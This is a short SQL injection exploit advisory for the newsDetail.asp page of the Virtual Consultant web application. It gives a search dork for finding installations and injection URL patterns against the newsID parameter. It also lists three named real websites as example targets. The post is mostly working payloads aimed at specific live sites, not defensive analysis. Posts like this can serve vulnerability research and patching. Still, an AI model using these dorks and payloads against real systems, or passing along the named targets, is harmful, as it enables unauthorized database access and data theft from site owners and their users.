[+] exploit title : Virtual Consultant (newsDetail.asp) SQL Injection Vulnerability
[+] author : CriminalCoder
[+] category : WebApps
[+] d0rk : inurl:/newsDetail.asp?secID= "Powered By Virtual Consultant"
[+] vendor : www.v-consultant.co.uk/
[+] myWEB : http://beyz4de.wordpress.com
[+] twitter : http://twitter.com/criminalcoder
[+] live Contact : criminalcoder@hotmail.de
[+] tested on : Windows XP

[+] Exploit
  # http://[localhost]/news/newsDetail.asp?secID={valid id}&newsID=' > {sql error}   
  # http://[localhost]/news/newsDetail.asp?secID={valid id}&newsID= sql here

[+] Example:
  http://www.justchefs.co.uk/news/newsDetail.asp?secID=1&newsID=3'
  http://www.football-jobs.com/news/newsDetail.asp?secID=1&newsID=34' 
  http://www.heatlondon.com/news/newsDetail.asp?secID=1&newsID=21'
=========greetz to===========NosleeP++ ~ TechnicaL ~ ByAR!FKnocKout ~ 3spi0n ~ Vezir.04and all my friends...==========================